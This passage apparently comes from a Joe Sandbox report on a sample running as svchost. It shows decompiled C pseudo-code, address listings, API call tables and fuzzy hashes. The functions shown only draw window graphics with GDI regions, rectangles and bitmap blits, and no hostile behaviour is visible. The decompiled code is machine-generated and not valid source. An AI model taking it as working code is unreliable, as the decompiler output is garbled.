    										 *(__esp + 0x28) = 0x496388;
    										__ecx = __esp + 0x28;
    										 *((char*)(__esp + 0x80)) = 4;
    										__eax = E00489F15(__ecx);
    										__ebx =  *(__esp + 0x14);
    										 *((char*)(__esp + 0x80)) = 0;
    										goto L30;
    									case 3:
    										__edi = 0;
    										__edx = __esp + 0x70;
    										__eax = E00425D90(__ecx, __esp + 0x70, 0, 0, __eax, __ecx, 0xcc0020);
    										__ecx = __esp + 0x38;
    										__eax = E00489F15(__ecx);
    										goto L31;
    								}
    							}
    							L31:
    							E004260F0(_t203 + 0x60);
    						}
    					}
    				}
    				_t104 = _t203 + 0x38; // 0x49637c
    				if(_t104 != 0 &&  *(_t203 + 0x3c) != _t190) {
    					_t129 = E0040C100( *((intOrPtr*)(_t158 + 0x48)));
    					_t203 = _t203 + 4;
    					_push(_t129);
    					_t130 = E00489F7B(_t203 + 0x28);
    					if(_t130 != _t190) {
    						_t190 =  *(_t130 + 4);
    					}
    					asm("sbb eax, eax");
    					FillRgn( *( *((intOrPtr*)(_t203 + 0x90)) + 4),  ~(_t203 + 0x38) &  *(_t203 + 0x3c), _t190);
    					 *(_t203 + 0x28) = 0x496388;
    					 *((char*)(_t203 + 0x80)) = 5;
    					E00489F15(_t203 + 0x28);
    				}
    				 *(_t203 + 0x38) = 0x496388;
    				 *((intOrPtr*)(_t203 + 0x80)) = 6;
    				E00489F15(_t203 + 0x38);
    				 *[fs:0x0] =  *((intOrPtr*)(_t203 + 0x78));
    				return 0x1335437;
    			}

    0x0041c360
    0x0041c360
    0x0041c362
    0x0041c36d
    0x0041c36e
    0x0041c375
    0x0041c37c
    0x0041c37e
    0x0041c380
    0x0041c384
    0x0041c388
    0x0041c390
    0x0041c397
    0x0041c3b9
    0x0041c3be
    0x0041c3c3
    0x0041c3cf
    0x0041c3d5
    0x0041c3db
    0x0041c3d7
    0x0041c3d7
    0x0041c3d7
    0x0041c3e5
    0x0041c3e5
    0x0041c3f1
    0x0041c3f7
    0x0041c3fb
    0x0041c3ff
    0x0041c403
    0x0041c407
    0x0041c40b
    0x0041c415
    0x0041c420
    0x0041c43a
    0x0041c449
    0x0041c461
    0x0041c46b
    0x0041c472
    0x0041c476
    0x0041c71a
    0x0041c71a
    0x0041c47c
    0x0041c47c
    0x00000000
    0x0041c48a
    0x0041c495
    0x0041c49a
    0x0041c49e
    0x0041c4b2
    0x0041c4c5
    0x0041c4ce
    0x0041c4dc
    0x0041c4e4
    0x0041c4eb
    0x0041c4f1
    0x0041c4fd
    0x0041c505
    0x0041c50a
    0x00000000
    0x00000000
    0x0041c517
    0x0041c51b
    0x0041c521
    0x0041c527
    0x0041c52b
    0x0041c52b
    0x0041c52f
    0x0041c531
    0x0041c531
    0x0041c535
    0x0041c537
    0x0041c53c
    0x0041c542
    0x0041c544
    0x0041c54f
    0x0041c555
    0x0041c559
    0x0041c55d
    0x0041c561
    0x0041c565
    0x0041c569
    0x0041c56d
    0x0041c571
    0x0041c576
    0x0041c582
    0x0041c594
    0x0041c594
    0x0041c599
    0x0041c59d
    0x0041c5a4
    0x0041c5a6
    0x0041c531
    0x0041c5aa
    0x0041c5ae
    0x0041c5b2
    0x0041c5b4
    0x0041c5bc
    0x0041c5c0
    0x0041c5c0
    0x0041c5c2
    0x0041c5c6
    0x00000000
    0x00000000
    0x0041c5d0
    0x0041c5d6
    0x0041c5d9
    0x0041c5dd
    0x0041c5e2
    0x0041c5e6
    0x0041c5e8
    0x0041c5ea
    0x0041c5f1
    0x0041c5f4
    0x0041c5f6
    0x0041c5f8
    0x0041c5f8
    0x0041c5fa
    0x0041c600
    0x0041c602
    0x0041c604
    0x0041c608
    0x0041c60a
    0x0041c60b
    0x0041c60d
    0x0041c60f
    0x0041c616
    0x0041c616
    0x0041c61a
    0x0041c622
    0x0041c626
    0x0041c62d
    0x0041c62f
    0x0041c633
    0x0041c637
    0x0041c63b
    0x0041c63d
    0x0041c641
    0x0041c643
    0x0041c647
    0x0041c64c
    0x0041c64e
    0x0041c650
    0x0041c650
    0x0041c654
    0x0041c656
    0x0041c658
    0x0041c65d
    0x0041c661
    0x0041c663
    0x0041c66a
    0x0041c673
    0x0041c675
    0x0041c676
    0x0041c67a
    0x0041c67c
    0x0041c682
    0x0041c684
    0x0041c687
    0x0041c689
    0x0041c689
    0x0041c693
    0x0041c699
    0x0041c69e
    0x0041c6a6
    0x0041c6ae
    0x0041c6b0
    0x0041c6b6
    0x0041c6be
    0x0041c6c5
    0x0041c6c9
    0x0041c6ce
    0x0041c6d2
    0x0041c6d2
    0x0041c6d6
    0x0041c6da
    0x0041c6de
    0x0041c6e0
    0x0041c6e4
    0x0041c6e6
    0x0041c6e8
    0x0041c6eb
    0x0041c6ef
    0x0041c6f5
    0x0041c6fd
    0x0041c701
    0x0041c709
    0x0041c70e
    0x0041c712
    0x00000000
    0x00000000
    0x0041c7c7
    0x0041c7cb
    0x0041c7d1
    0x0041c7d6
    0x0041c7da
    0x00000000
    0x00000000
    0x0041c47c
    0x0041c71c
    0x0041c721
    0x0041c721
    0x0041c43a
    0x0041c40b
    0x0041c726
    0x0041c72c
    0x0041c738
    0x0041c73d
    0x0041c744
    0x0041c745
    0x0041c74c
    0x0041c74e
    0x0041c74e
    0x0041c75b
    0x0041c76c
    0x0041c772
    0x0041c77e
    0x0041c786
    0x0041c786
    0x0041c78b
    0x0041c797
    0x0041c7a2
    0x0041c7b4
    0x0041c7be

    APIs
    • CreateRectRgn.GDI32(?,?,?,?), ref: 0041C3AE
    • GetClientRect.USER32(?,?), ref: 0041C449
    • CreateRectRgn.GDI32 ref: 0041C4BA
    • CombineRgn.GDI32(?,?,|cI,00000004), ref: 0041C4EB
    • SetRect.USER32(?,00000000,?,?,?), ref: 0041C542
    • IntersectRect.USER32(?,?,?), ref: 0041C54F
    • IsRectEmpty.USER32(?), ref: 0041C57A
    • __ftol.LIBCMT ref: 0041C658
    • __ftol.LIBCMT ref: 0041C665
    • CreateRectRgn.GDI32(00000000,?,00000000,00000000), ref: 0041C6BE
    • CombineRgn.GDI32(?,?,|cI,00000004), ref: 0041C6EF
      • Part of subcall function 00425D90: SetStretchBltMode.GDI32(?,00000000), ref: 00425DA4
      • Part of subcall function 00425D90: CreateCompatibleDC.GDI32(?), ref: 00425E29
      • Part of subcall function 00425D90: CreateCompatibleDC.GDI32(?), ref: 00425E41
      • Part of subcall function 00425D90: GetObjectA.GDI32(?,00000018,?), ref: 00425E82
      • Part of subcall function 00425D90: CreateBitmap.GDI32(?,?,00000001,00000001,00000000), ref: 00425E98
    • FillRgn.GDI32(?,?,00000000), ref: 0041C76C
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Rect$Create$CombineCompatible__ftol$BitmapClientEmptyFillIntersectModeObjectStretch
    • String ID: |cI$|cI
    • API String ID: 3212946024-1582058208
    • Opcode ID: 9f2f3babf597508a9b227a7ad56c983919b5f948e8258afc0ae4af4450ca166e
    • Instruction ID: ca48216e322a323c5e02105f273f010dd4b8f1948b5e99b5c840a1bd6257e690
    • Opcode Fuzzy Hash: 9f2f3babf597508a9b227a7ad56c983919b5f948e8258afc0ae4af4450ca166e
    • Instruction Fuzzy Hash: EFD18D71108341AFC714DF25C884AAFBBE9BBC8354F148A2EF99983251D774E845CB66
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 80%
    			E00446920(void* __ecx, void* __fp0) {
    				int _v8;
    				intOrPtr _v12;
    				char _v56;
    				char _v68;
    				char _v96;
    				char _v100;
    				void* _v104;
    				char _v108;
    				intOrPtr _v120;
    				struct tagPOINT _v128;
    				signed int _v132;
    				int _v136;
    				struct HDC__* _v140;
    				signed int _v144;
    				signed int _v148;
    				struct HDC__* _v164;
    				char _v168;
    				intOrPtr _v172;
    				void* _v176;
    				char _v184;
    				intOrPtr _v192;
    				long _v196;
    				long _v200;
    				struct tagRECT _v216;
    				signed int _v220;
    				void* _v224;
    				struct tagRECT _v240;
    				long _v244;
    				struct tagPOINT _v248;
    				intOrPtr _v252;
    				intOrPtr _v256;
    				long _v260;
    				intOrPtr _v264;
    				long _v268;
    				long _v296;
    				char _v300;
    				void* __ebp;
    				void* _t168;
    				intOrPtr _t170;
    				signed int _t184;
    				long _t195;
    				intOrPtr _t204;
    				long _t211;
    				signed int _t219;
    				intOrPtr _t221;
    				long _t225;
    				char _t236;
    				int _t243;
    				long _t244;
    				signed int _t247;
    				void* _t257;
    				void* _t259;
    				intOrPtr _t262;
    				void* _t264;
    				int _t271;
    				intOrPtr _t284;
    				void* _t301;
    				long _t304;
    				signed int _t342;
    				long _t345;
    				int _t359;
    				intOrPtr _t368;
    				void* _t370;
    				void* _t372;
    				void* _t375;
    				intOrPtr* _t377;
    				intOrPtr _t385;
    				void* _t386;
    				void* _t388;
    				void* _t403;
    				void* _t404;
    
    				_t404 = __fp0;
    				_push(0xffffffff);
    				_push(E00490494);
    				_push( *[fs:0x0]);
    				 *[fs:0x0] = _t385;
    				_t386 = _t385 - 0xc8;
    				_t372 = __ecx;
    				_t168 = E0042D860( *((intOrPtr*)(__ecx + 0x3c)));
    				_t375 = _t168;
    				_t359 = 0;
    				_t389 = _t375;
    				if(_t375 == 0) {
    					L20:
    					 *[fs:0x0] = _v12;
    					return _t168;
    				}
    				_push(__ecx);
    				E00489D7E( &_v96, _t389);
    				_t170 =  *((intOrPtr*)(__ecx + 0xd0));
    				_v8 = 0;
    				_push(_t170);
    				_push(_t170);
    				E00445E70( &_v100);
    				_t386 = _t386 + 0xc;
    				_t259 = E0042AB80(_t375);
    				_v216.left = 0;
    				_t390 = _t259;
    				if(_t259 <= 0) {
    					L3:
    					_t377 = _t372 + 0x68;
    					_t271 = E0042C7C0(_t377);
    					if(_t271 == 0xffffffff) {
    						L6:
    						_t271 = MulDiv( *(_t372 + 0xc8), 0x64, _v216.left);
    						if(_t271 != 0xfffffffe) {
    							L8:
    							asm("cdq");
    							_v132 = ( *(_t372 + 0xcc) +  *(_t372 + 0xcc) * 4 + ( *(_t372 + 0xcc) +  *(_t372 + 0xcc) * 4) * 4 << 2) / _t271;
    							_v216.left = (0x51eb851f * _t271 *  *(_t372 + 0xd0) >> 0x20 >> 5) + (0x51eb851f * _t271 *  *(_t372 + 0xd0) >> 0x20 >> 5 >> 0x1f);
    							_t184 = E00486411(_t372, 1);
    							_v148 =  ~((E00486411(_t372, 0) << 4) - _t185) << 1;
    							_v144 =  ~((_t184 << 4) - _t184) << 1;
    							E00489BAD( &_v108,  &_v148);
    							GetClientRect( *(_t372 + 0x1c),  &_v128);
    							DPtoLP(_v104,  &_v128, 2);
    							_t284 =  *((intOrPtr*)(_t372 + 0x48));
    							asm("cdq");
    							_t195 = _v120 - _t284 - _v128 - _v128 >> 1;
    							if(_t195 < 0x32) {
    								_t195 = 0x32;
    							}
    							_v216.bottom.x = _t284 + _t195;
    							_v216.top.left = _t195;
    							_v200 =  *((intOrPtr*)(_t372 + 0x4c)) + 0x32;
    							_v216.right = 0x32;
    							OffsetRect( &(_v216.top), _v140, _v136);
    							E004894D6( &_v100, 7);
    							E004894D6( &_v104, 0);
    							Rectangle(_v104, _v220, _v216.left, _v216.top, _v216.right);
    							_push(0);
    							E00489F7B( &(_v216.right));
    							_t204 = _v240.right;
    							_v224 = _t204;
    							_v216.left = _t204 + 0x1e;
    							asm("sbb eax, eax");
    							_v240.bottom.left = _v244 + 0x1e;
    							_v220 = _v240.top.x + 0x1e;
    							FillRect(_v128,  &(_v240.bottom),  ~( &(_v216.top)) & _v216.right);
    							_t211 = _v248;
    							_v240.left = _t211;
    							_v240.right = _t211 + 0x1e;
    							_v240.bottom.left = _v244 + 0x1e;
    							_v240.top.x = _v252 + 0x1e;
    							asm("sbb eax, eax");
    							FillRect(_v140,  &_v240,  ~( &_v224) & _v220);
    							_t219 =  *(_t372 + 0xd4);
    							if(_t219 >= 0 && _t219 <=  *((intOrPtr*)(_t372 + 0xdc)) - 1) {
    								_t342 = _t219 + _t219 * 2;
    								_t221 =  *((intOrPtr*)(_t372 + 0xd8));
    								_t301 = _t221 + _t342 * 4;
    								_v176 =  *((intOrPtr*)(_t221 + _t342 * 4));
    								_v172 =  *((intOrPtr*)(_t301 + 4));
    								_t368 =  *((intOrPtr*)(_t301 + 8));
    								_t225 =  *((intOrPtr*)(_t372 + 0x58)) +  *_t377 + _v260;
    								_v244 = _v260;
    								_v244 = _t225;
    								_t345 = _v252 -  *((intOrPtr*)(_t372 + 0x70)) +  *((intOrPtr*)(_t372 + 0x60));
    								_v240.top.x = _t345;
    								_v196 = _t345;
    								_v216.bottom.x = _t225;
    								_t304 = _v256 +  *((intOrPtr*)(_t372 + 0x6c)) +  *((intOrPtr*)(_t372 + 0x5c));
    								_v240.left = _t304;
    								_t262 = _v248 -  *((intOrPtr*)(_t372 + 0x74)) +  *((intOrPtr*)(_t372 + 0x64));
    								_v200 = _t304;
    								_v240.right = _t262;
    								_v192 = _t262;
    								LPtoDP(_v140,  &(_v216.bottom), 2);
    								if(IsRectEmpty( &_v216) == 0) {
    									_v240.bottom.left = 0;
    									_v216.right = _v216.right + 3;
    									_v216.bottom.x = _v216.bottom.x + 3;
    									_v240.right = 0x498754;
    									_v68 = 2;
    									E00489EBE( &(_v240.top), CreateRectRgnIndirect( &_v216));
    									E0048993F( &_v168,  &_v240);
    									_v240.top.x = _v268;
    									_v240.right = _v264;
    									LPtoDP(_v164,  &(_v240.top), 1);
    									_t236 = _v300;
    									_push(_t236);
    									_push(_t236);
    									E00445E70( &_v184);
    									_t388 = _t386 + 0xc;
    									DPtoLP(_v176,  &_v248, 1);
    									_t264 = E0042D7F0( *((intOrPtr*)(_t372 + 0x3c)));
    									E0042D800( *((intOrPtr*)(_t372 + 0x3c)), 1);
    									if( *(_t372 + 0xd4) !=  *((intOrPtr*)(_t372 + 0xdc)) - 1 ||  *((intOrPtr*)(_t372 + 0x8c)) != 1 ||  *((intOrPtr*)(_t372 + 0xc0)) > 0) {
    										_t243 = 0;
    										__eflags = 0;
    									} else {
    										_t243 = _v216.right;
    									}
    									_push(_t243);
    									_t244 = _v200;
    									_t370 = _t368 - _t244 + 1;
    									_t403 = _t370;
    									_push(_t370);
    									_push(_t244);
    									_push(_v240.top.x);
    									_push(_v240.left);
    									_push( &_v176);
    									E004336C0( *((intOrPtr*)(_t372 + 0x3c)), _t404);
    									_t247 =  *(_t372 + 0xd0);
    									_push(_t247);
    									_push(_t247);
    									E00445E70( &_v200);
    									_t386 = _t388 + 0xc;
    									E0048993F( &_v200, 0);
    									_push(_v240.right);
    									_push( *((intOrPtr*)(_t372 + 0x78)));
    									_push( &_v300);
    									_push( &(_v216.bottom));
    									E004334D0();
    									E0042D800( *((intOrPtr*)(_t372 + 0x3c)), _t264);
    									_v296 = 0x498748;
    									_v132 = 3;
    									E00489F15( &_v296);
    								}
    							}
    							_v240.bottom.left = 0x498748;
    							_v56 = 4;
    							E00489F15( &(_v240.bottom));
    							_v56 = 0xffffffff;
    							_t168 = E00489DF0( &_v148, _t403);
    							goto L20;
    						}
    						L7:
    						_t271 = 0x64;
    						goto L8;
    					}
    					if(_t271 != 0xfffffffe) {
    						goto L8;
    					}
    					if(_v216 <=  *(_t372 + 0xc8)) {
    						goto L7;
    					}
    					goto L6;
    				} else {
    					goto L2;
    				}
    				do {
    					L2:
    					_t257 = E0042AB90(_t375, _t390, _t359);
    					_t359 = _t359 + 1;
    					_v220 = _v220 + _t257;
    				} while (_t359 < _t259);
    				goto L3;
    			}

    0x00446920
    0x00446926
    0x00446928
    0x0044692d
    0x0044692e
    0x00446935
    0x0044693d
    0x00446943
    0x00446948
    0x0044694a
    0x0044694c
    0x0044694e
    0x00446e02
    0x00446e0c
    0x00446e19
    0x00446e19
    0x00446955
    0x0044695d
    0x00446962
    0x00446968
    0x0044696f
    0x00446970
    0x00446979
    0x0044697e
    0x00446988
    0x0044698a
    0x0044698e
    0x00446990
    0x004469a9
    0x004469a9
    0x004469b3
    0x004469b8
    0x004469cd
    0x004469e1
    0x004469e6
    0x004469ed
    0x004469fe
    0x00446a08
    0x00446a1f
    0x00446a23
    0x00446a4c
    0x00446a57
    0x00446a5b
    0x00446a69
    0x00446a7e
    0x00446a84
    0x00446a93
    0x00446a96
    0x00446a9b
    0x00446a9d
    0x00446a9d
    0x00446aa8
    0x00446ab2
    0x00446aba
    0x00446ac5
    0x00446acd
    0x00446adc
    0x00446aea
    0x00446b0b
    0x00446b11
    0x00446b17
    0x00446b1c
    0x00446b28
    0x00446b33
    0x00446b43
    0x00446b45
    0x00446b5d
    0x00446b63
    0x00446b65
    0x00446b6d
    0x00446b74
    0x00446b82
    0x00446b8c
    0x00446b94
    0x00446ba6
    0x00446ba8
    0x00446bb0
    0x00446bc5
    0x00446bc8
    0x00446bd4
    0x00446bda
    0x00446be5
    0x00446bf3
    0x00446bfa
    0x00446c02
    0x00446c0a
    0x00446c0e
    0x00446c16
    0x00446c1a
    0x00446c1e
    0x00446c29
    0x00446c37
    0x00446c3b
    0x00446c3d
    0x00446c41
    0x00446c45
    0x00446c4f
    0x00446c5e
    0x00446c71
    0x00446c7d
    0x00446c81
    0x00446c85
    0x00446c91
    0x00446ca5
    0x00446cb6
    0x00446cc3
    0x00446cd6
    0x00446cda
    0x00446cdc
    0x00446ce7
    0x00446ce8
    0x00446cea
    0x00446cf6
    0x00446d01
    0x00446d14
    0x00446d16
    0x00446d2a
    0x00446d45
    0x00446d45
    0x00446d3f
    0x00446d3f
    0x00446d3f
    0x00446d47
    0x00446d48
    0x00446d52
    0x00446d52
    0x00446d5a
    0x00446d5b
    0x00446d60
    0x00446d61
    0x00446d65
    0x00446d66
    0x00446d6b
    0x00446d71
    0x00446d72
    0x00446d7b
    0x00446d80
    0x00446d8c
    0x00446d98
    0x00446d9d
    0x00446da5
    0x00446da6
    0x00446daa
    0x00446db3
    0x00446db8
    0x00446dc4
    0x00446dcc
    0x00446dcc
    0x00446c5e
    0x00446dd1
    0x00446ddd
    0x00446de5
    0x00446df1
    0x00446dfc
    0x00000000
    0x00446e01
    0x004469e8
    0x004469e8
    0x00000000
    0x004469e8
    0x004469bd
    0x00000000
    0x00000000
    0x004469cb
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00446992
    0x00446992
    0x00446995
    0x004469a0
    0x004469a3
    0x004469a3
    0x00000000

    APIs
      • Part of subcall function 00489D7E: __EH_prolog.LIBCMT ref: 00489D83
      • Part of subcall function 00489D7E: BeginPaint.USER32(?,?,?,?,0040D2F9), ref: 00489DAC
      • Part of subcall function 00445E70: GetWindowExtEx.GDI32(?,?), ref: 00445E93
    • MulDiv.KERNEL32(?,00000064,?), ref: 004469DB
    • GetClientRect.USER32(?,?), ref: 00446A69
    • DPtoLP.GDI32(?,?,00000002), ref: 00446A7E
    • OffsetRect.USER32 ref: 00446ACD
    • Rectangle.GDI32(?,?,?,?,?), ref: 00446B0B
    • FillRect.USER32(?,?,?), ref: 00446B63
    • FillRect.USER32(?,00000032,?), ref: 00446BA6
    • LPtoDP.GDI32(?,?,00000002), ref: 00446C4F
    • IsRectEmpty.USER32(?), ref: 00446C56
    • CreateRectRgnIndirect.GDI32(?), ref: 00446C9A
      • Part of subcall function 0048993F: SelectClipRgn.GDI32(?,00000000), ref: 00489961
      • Part of subcall function 0048993F: SelectClipRgn.GDI32(?,?), ref: 00489977
    • LPtoDP.GDI32(?,?,00000001), ref: 00446CDA
    • DPtoLP.GDI32(?,?,00000001), ref: 00446D01
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Rect$ClipFillSelect$BeginClientCreateEmptyH_prologIndirectOffsetPaintRectangleWindow
    • String ID: 2
    • API String ID: 2521159323-450215437
    • Opcode ID: fe276b8e35ff110e8f123be98c0e5582bb872bb1aec27581ef5c309ca41490c1
    • Instruction ID: 031c37083d8c1f3f6dac08aa35d70d85146f0fe552c25f2e010331297df93c53
    • Opcode Fuzzy Hash: fe276b8e35ff110e8f123be98c0e5582bb872bb1aec27581ef5c309ca41490c1
    • Instruction Fuzzy Hash: 0BE12BB16087409FD324DF69C881A6BB7E5BFC8704F448A2EF59A83351DB74E904CB56
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 89%
    			E0043A6C0(void* __ecx, void* __fp0, struct HDC__* _a4) {
    				int _v8;
    				intOrPtr _v12;
    				int _v16;
    				struct tagRECT _v32;
    				char _v36;
    				char _v44;
    				char _v52;
    				void* _v56;
    				char _v60;
    				char _v64;
    				int _v68;
    				int _v72;
    				int _v76;
    				void* _v92;
    				void* __ebp;
    				int _t66;
    				struct HBRUSH__* _t82;
    				struct HBRUSH__* _t88;
    				struct HBRUSH__* _t92;
    				struct HDC__* _t97;
    				int _t112;
    				struct HDC__* _t133;
    				void* _t135;
    				intOrPtr _t141;
    				void* _t149;
    
    				_t149 = __fp0;
    				_push(0xffffffff);
    				_push(E004901B8);
    				_push( *[fs:0x0]);
    				 *[fs:0x0] = _t141;
    				_t135 = __ecx;
    				_t97 = _a4;
    				GetClientRect( *(__ecx + 0x1c),  &(_v32.top));
    				_t66 =  *(_t135 + 0xcc);
    				if(_t66 != 0) {
    					L14:
    					if( *(_t135 + 0xc0) == 0) {
    						L26:
    						 *[fs:0x0] = _v12;
    						return _t66;
    					}
    					if(_t66 != 0 ||  *(_t135 + 0xc4) == 0) {
    						L18:
    						 *(_t135 + 0xc4) = 1;
    						if( *(_t135 + 0xb8) == 0) {
    							_push( *((intOrPtr*)(_t135 + 0xdc)));
    							_t82 = E00489F7B( &_v36);
    							if(_t82 != 0) {
    								_t82 =  *(_t82 + 4);
    							}
    							FillRect(_a4,  &_v32, _t82);
    							_v52 = 0x497844;
    							_t40 =  &_v52; // 0x497844
    							_v32.bottom = 2;
    							E00489F15(_t40);
    							_v32.bottom = 0xffffffff;
    						}
    						_t133 = CreateCompatibleDC(_t97);
    						_v56 = SelectObject(_t133,  *(_t135 + 0xc0));
    						E0043A530(_t135, _t149,  &_v68,  &_v8,  &_v60,  &_v64);
    						if( *((intOrPtr*)(_t135 + 0xd0)) == 0) {
    							BitBlt(_t97, _v68, _v8,  *(_t135 + 0xd4),  *(_t135 + 0xd8), _t133, 0, 0, 0xcc0020);
    						} else {
    							SetStretchBltMode(_t97, E004204B0());
    							StretchBlt(_t97, _v76, _v16, _v68, _v72, _t133, 0, 0,  *(_t135 + 0xd4),  *(_t135 + 0xd8), 0xcc0020);
    						}
    						SelectObject(_t133, _v92);
    						 *(_t135 + 0xc4) = 0;
    						_t66 = DeleteDC(_t133);
    						goto L26;
    					} else {
    						do {
    						} while ( *(_t135 + 0xc4) != 0);
    						goto L18;
    					}
    				}
    				_t112 =  *(_t135 + 0xc8);
    				if(_t112 != 0) {
    					goto L14;
    				}
    				if( *((intOrPtr*)(_t135 + 0xe0)) != 1) {
    					if(_t112 != 0 ||  *((intOrPtr*)(_t135 + 0xe0)) != 0) {
    						goto L14;
    					} else {
    						_t66 =  *(_t135 + 0xb8);
    						if(_t66 == 0) {
    							_push( *((intOrPtr*)(_t135 + 0xdc)));
    							_t88 = E00489F7B( &_v44);
    							if(_t88 != 0) {
    								_t88 =  *(_t88 + 4);
    							}
    							FillRect(_a4,  &_v32, _t88);
    							_v60 = 0x497844;
    							_t27 =  &_v60; // 0x497844
    							_v32.bottom = 1;
    							_t66 = E00489F15(_t27);
    						}
    						goto L26;
    					}
    				}
    				 *(_t135 + 0xc8) = 1;
    				if( *(_t135 + 0xb8) == 0) {
    					_push( *((intOrPtr*)(_t135 + 0xdc)));
    					_t92 = E00489F7B( &_v44);
    					if(_t92 != 0) {
    						_t92 =  *(_t92 + 4);
    					}
    					FillRect(_a4,  &_v32, _t92);
    					_v60 = 0x497844;
    					_t16 =  &_v60; // 0x497844
    					_v32.bottom = 0;
    					E00489F15(_t16);
    					_v32.bottom = 0xffffffff;
    				}
    				_t66 = E0043A940();
    				goto L26;
    			}

    APIs
    • GetClientRect.USER32(?,?), ref: 0043A6EE
    • FillRect.USER32(?,?,00000000), ref: 0043A74E
    • FillRect.USER32(?,?,00000000), ref: 0043A7BE
      • Part of subcall function 00489F7B: __EH_prolog.LIBCMT ref: 00489F80
      • Part of subcall function 00489F7B: CreateSolidBrush.GDI32(?), ref: 00489F9D
    • FillRect.USER32(?,?,00000000), ref: 0043A835
    • CreateCompatibleDC.GDI32(?), ref: 0043A85D
    • SelectObject.GDI32(00000000,?), ref: 0043A873
    • SetStretchBltMode.GDI32(?,00000000), ref: 0043A8A5
    • StretchBlt.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0043A8D8
    • BitBlt.GDI32(?,00000000,?,?,?,00000000,00000000,00000000,00CC0020), ref: 0043A903
    • SelectObject.GDI32(00000000,?), ref: 0043A90F
    • DeleteDC.GDI32(00000000), ref: 0043A91C
    Strings
    Memory Dump Source
    • Source File: 00000007.00000002.354080480.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000007.00000002.354075746.0000000000400000.00000004.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354237145.0000000000492000.00000002.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354256787.00000000004A9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354272754.00000000004BC000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354279290.00000000004C9000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354285398.00000000004DF000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354290473.00000000004E1000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354296180.00000000004E3000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354302342.00000000004F4000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354309656.00000000004FB000.00000040.00000400.00020000.00000000.sdmp
    • Associated: 00000007.00000002.354317950.000000000050A000.00000040.00000400.00020000.00000000.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_7_2_400000_svchost.jbxd
    Similarity
    • API ID: Rect$Fill$CreateObjectSelectStretch$BrushClientCompatibleDeleteH_prologModeSolid
    • String ID: DxI$DxI
    • API String ID: 1645634290-798960703
    • Opcode ID: f1c46862a07a8a99f9201247ebc5460f25575b12ce4272548969a4160a9a099a
    • Instruction ID: f5511c6e2250695efe54a65c3da7ed310d6e4cfe9f78b2f17b0a4dc4b4492e22
    • Opcode Fuzzy Hash: f1c46862a07a8a99f9201247ebc5460f25575b12ce4272548969a4160a9a099a
    • Instruction Fuzzy Hash: F8613E75244701AFD724DF65C984F6BB3F8AF98704F00591EF69A93280DB78E805CB66
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E0043CCF0(signed int __ecx, void* _a4, void** _a8, void* _a12) {
    				intOrPtr _v0;
    				char _v4;
    				signed int _v8;
    				signed int _v16;
    				void* _t67;
    				void* _t70;
    				void* _t71;
    				void* _t72;
    				void** _t75;
    				void* _t77;
    				void* _t91;
    				intOrPtr* _t93;
    				intOrPtr* _t96;
    				intOrPtr* _t97;
    				void* _t98;
    				intOrPtr _t106;
